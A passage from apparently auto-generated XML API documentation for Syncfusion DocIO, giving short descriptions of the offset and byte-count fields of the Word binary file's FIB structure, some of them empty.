        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfphe">
            <summary>
            count of bytes of paragraph height PLC. ==0 when file is non-complex.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcSttbfglsy">
            <summary>
            offset in table stream of glossary string table. This table consists of Pascal style strings (strings stored prefixed with a length byte) concatenated one after another.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbSttbfglsy">
            <summary>
            count of bytes of glossary string table. == 0 for non-glossary documents.!=0 for glossary documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfglsy">
            <summary>
            offset in table stream of glossary PLC. CPs in PLC are relative to main document and mark the beginnings of glossary entries and are in 1-1 correspondence with entries of sttbfglsy. No structure is stored in this PLC. There will be n+1 FC entries in this PLC when there are n glossary entries.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfglsy">
            <summary>
            count of bytes of glossary PLC.== 0 for non-glossary documents.!=0 for glossary documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfhdd">
            <summary>
            byte offset in table stream of header HDD PLC. CPs are relative to header subdocument and mark the beginnings of individual headers in the header subdocument. No structure is stored in this PLC. There will be n+1 FC entries in this PLC when there are n headers stored for the document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfhdd">
            <summary>
            count of bytes of header PLC.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfbteChpx">
            <summary>
            offset in table stream of character property bin table.PLC. FCs in PLC are file offsets in the main stream. Describes text of main document and all subdocuments.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfbteChpx">
            <summary>
            count of bytes of character property bin table PLC.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfbtePapx">
            <summary>
            offset in table stream of paragraph property bin table.PLC. FCs in PLC are file offsets in the main stream. Describes text of main document and all subdocuments.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfbtePapx">
            <summary>
            count of bytes of paragraph property bin table PLC
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfsea">
            <summary>
            offset in table stream of PLC reserved for private use. The SEA is 6 bytes long.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfsea">
            <summary>
            count of bytes of private use PLC.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcSttbfffn">
            <summary>
            offset in table stream of font information STTBF. The sttbfffn is a STTBF where is string is actually an FFN structure. The nth entry in the STTBF describes the font that will be displayed when the chp.ftc for text is equal to n. See the FFN file structure definition.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbSttbfffn">
            <summary>
            count of bytes in sttbfffn.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcffldMom">
            <summary>
            offset in table stream to the FLD PLC of field positions in the main document. The CPs point to the beginning CP of a field, the CP of field separator character inside a field and the ending CP of the field. A field may be nested within another field. 20 levels of field nesting are allowed.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcffldMom">
            <summary>
            count of bytes in plcffldMom
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcffldHdr">
            <summary>
            offset in table stream to the FLD PLC of field positions in the header subdocument.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcffldHdr">
            <summary>
            count of bytes in plcffldHdr
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcffldFtn">
            <summary>
            offset in table stream to the FLD PLC of field positions in the footnote subdocument.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcffldFtn">
            <summary>
            count of bytes in plcffldFtn
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcffldAtn">
            <summary>
            offset in table stream to the FLD PLC of field positions in the annotation subdocument.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcffldAtn">
            <summary>
            count of bytes in plcffldAtn
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcffldMcr">
            <summary>
            no longer used
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcffldMcr">
            <summary>
            no longer used
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcSttbfbkmk">
            <summary>
            offset in table stream of the STTBF that records bookmark names in the main document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbSttbfbkmk">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfbkf">
            <summary>
            offset in table stream of the PLCF that records the beginning CP offsets of bookmarks in the main document. See BKF structure definition
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfbkf">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfbkl">
            <summary>
            offset in table stream of the PLCF that records the ending CP offsets of bookmarks recorded in the main document. No structure is stored in this PLCF.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfbkl">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcCmds">
            <summary>
            offset in table stream of the macro commands. These commands are private and undocumented.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbCmds">
            <summary>
            undocument size of undocument structure not documented above
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcmcr">
            <summary>
            no longer used
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcmcr">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcSttbfmcr">
            <summary>
            no longer used
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbSttbfmcr">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPrDrvr">
            <summary>
            offset in table stream of the printer driver information (names of drivers, port, etc.)
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPrDrvr">
            <summary>
            count of bytes of the printer driver information (names of drivers, port, etc.)
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPrEnvPort">
            <summary>
            offset in table stream of the print environment in portrait mode.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPrEnvPort">
            <summary>
            count of bytes of the print environment in portrait mode.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPrEnvLand">
            <summary>
            offset in table stream of the print environment in landscape mode.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPrEnvLand">
            <summary>
            count of bytes of the print environment in landscape mode.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcWss">
            <summary>
            offset in table stream of Window Save State data structure. WSS contains dimensions of document's main text window and the last selection made by Word user.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbWss">
            <summary>
            count of bytes of WSS. ==0 if unable to store the window state. Should not be written by third party creators of Word files.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcDop">
            <summary>
            offset in table stream of document property data structure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbDop">
            <summary>
            count of bytes of document properties.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcSttbfAssoc">
            <summary>
            offset in table stream of STTBF of associated strings. The strings in this table specify document summary info and the paths to special documents related to this document. See documentation of the STTBFASSOC.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbSttbfAssoc">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcClx">
            <summary>
            offset in table stream of beginning of information for complex files. Consists of an encoding of all of the prms quoted by the document followed by the plcpcd (piece table) for the document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbClx">
            <summary>
            count of bytes of complex file information == 0 if file is non-complex.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfpgdFtn">
            <summary>
            not used
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfpgdFtn">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcAutosaveSource">
            <summary>
            offset in table stream of the name of the original file. fcAutosaveSource and cbAutosaveSource should both be 0 if autosave is off.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbAutosaveSource">
            <summary>
            count of bytes of the name of the original file.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcGrpXstAtnOwners">
            <summary>
            offset in table stream of group of strings recording the names of the owners of annotations stored in the document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbGrpXstAtnOwners">
            <summary>
            count of bytes of the group of strings
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcSttbfAtnbkmk">
            <summary>
            offset in table stream of the sttbf that records names of bookmarks for the annotation subdocument
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbSttbfAtnbkmk">
            <summary>
            length in bytes of the sttbf that records names of bookmarks for the annotation subdocument
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcdoaMom">
            <summary>
            no longer used
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcdoaMom">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcdoaHdr">
            <summary>
            no longer used
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcdoaHdr">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcspaMom">
            <summary>
            offset in table stream of the FSPA PLC for main document. == 0 if document has no office art objects.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcspaMom">
            <summary>
            length in bytes of the FSPA PLC of the main document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcspaHdr">
            <summary>
            offset in table stream of the FSPA PLC for header document. == 0 if document has no office art objects.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcspaHdr">
            <summary>
            length in bytes of the FSPA PLC of the header document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfAtnbkf">
            <summary>
            offset in table stream of BKF (bookmark first) PLC of the annotation subdocument
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfAtnbkf">
            <summary>
            length in bytes of BKF (bookmark first) PLC of the annotation subdocument
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfAtnbkl">
            <summary>
            offset in table stream of BKL (bookmark last) PLC of the annotation subdocument
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfAtnbkl">
            <summary>
            length in bytes of PLC marking the CP limits of the annotation bookmarks. No structure is stored in this PLC.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPms">
            <summary>
            offset in table stream of PMS (Print Merge State) information block. This contains the current state of a print merge operation
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPms">
            <summary>
            length in bytes of PMS. ==0 if no current print merge state. Should not be written by third party creators of Word files.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcFormFldSttbs">
            <summary>
            offset in table stream of form field Sttbf which contains strings used in form field dropdown controls
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbFormFldSttbs">
            <summary>
            length in bytes of form field Sttbf
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfendRef">
            <summary>
            offset in table stream of endnote reference PLCF of FRD structures. CPs in PLCF are relative to main document text stream and give location of endnote references.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfendRef">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfendTxt">
            <summary>
            offset in table stream of PlcfendRef which points to endnote text in the endnote document stream which corresponds with the plcfendRef. No structure is stored in this PLC.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfendTxt">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcffldEdn">
            <summary>
            offset in table stream to FLD PLCF of field positions in the endnote subdoc
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcffldEdn">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfpgdEdn">
            <summary>
            not used
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfpgdEdn">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcDggInfo">
            <summary>
            offset in table stream of the office art object table data. The format of office art object table data is found in a separate document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbDggInfo">
            <summary>
            length in bytes of the office art object table data
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcSttbfRMark">
            <summary>
            offset in table stream to STTBF that records the author abbreviations for authors who have made revisions in the document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbSttbfRMark">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcSttbCaption">
            <summary>
            offset in table stream to STTBF that records caption titles used in the document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbSttbCaption">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcSttbAutoCaption">
            <summary>
            offset in table stream to the STTBF that records the object names and indices into the caption STTBF for objects which get auto captions.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbSttbAutoCaption">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfwkb">
            <summary>
            offset in table stream to WKB PLCF that describes the boundaries of contributing documents in a master document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfwkb">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfspl">
            <summary>
            offset in table stream of PLCF (of SPLS structures) that records spell check state
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfspl">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcftxbxTxt">
            <summary>
            offset in table stream of PLCF that records the beginning CP in the text box subdoc of the text of individual text box entries. No structure is stored in this PLCF
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcftxbxTxt">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcffldTxbx">
            <summary>
            offset in table stream of the FLD PLCF that records field boundaries recorded in the textbox subdoc.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcffldTxbx">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfhdrtxbxTxt">
            <summary>
            offset in table stream of PLCF that records the beginning CP in the header text box subdoc of the text of individual header text box entries. No structure is stored in this PLC.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfhdrtxbxTxt">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcffldHdrTxbx">
            <summary>
            offset in table stream of the FLD PLCF that records field boundaries recorded in the header textbox subdoc.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcffldHdrTxbx">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcStwUser">
            <summary>
            Macro User storage
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbStwUser">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcSttbttmbd">
            <summary>
            offset in table stream of embedded true type font data.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.cbSttbttmbd">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcUnused">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbUnused">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPgdMother">
            <summary>
            offset in table stream of the PLF that records the page descriptors for the main text of the doc.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPgdMother">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcBkdMother">
            <summary>
            offset in table stream of the PLCF that records the break descriptors for the main text of the doc.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbBkdMother">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPgdFtn">
            <summary>
            offset in table stream of the PLF that records the page descriptors for the footnote text of the doc.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPgdFtn">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcBkdFtn">
            <summary>
            offset in table stream of the PLCF that records the break descriptors for the footnote text of the doc.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbBkdFtn">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPgdEdn">
            <summary>
            offset in table stream of the PLF that records the page descriptors for the endnote text of the doc.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPgdEdn">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcBkdEdn">
            <summary>
            offset in table stream of the PLCF that records the break descriptors for the endnote text of the doc.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbBkdEdn">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcSttbfIntlFld">
            <summary>
            offset in table stream of the STTBF containing field keywords. This is only used in a small number of the international versions of word. This field is no longer written to the file for nFib >= 167.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbSttbfIntlFld">
            <summary>
            Always 0 for nFib >= 167.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcRouteSlip">
            <summary>
            offset in table stream of a mailer routing slip.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbRouteSlip">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcSttbSavedBy">
            <summary>
            offset in table stream of STTBF recording the names of the users who have saved this document alternating with the save locations.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbSttbSavedBy">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcSttbFnm">
            <summary>
            offset in table stream of STTBF recording filenames of documents which are referenced by this document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbSttbFnm">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfLst">
            <summary>
            offset in the table stream of list format information.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfLst">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlfLfo">
            <summary>
            offset in the table stream of list format override information.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlfLfo">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcftxbxBkd">
            <summary>
            offset in the table stream of the textbox break table (a PLCF of BKDs) for the main document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcftxbxBkd">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcftxbxHdrBkd">
            <summary>
            offset in the table stream of the textbox break table (a PLCF of BKDs) for the header subdocument
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcftxbxHdrBkd">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcDocUndo">
            <summary>
            offset in main stream of undocumented undo / versioning data
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbDocUndo">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcRgbuse">
            <summary>
            offset in main stream of undocumented undo / versioning data
            </summary>
        </member>
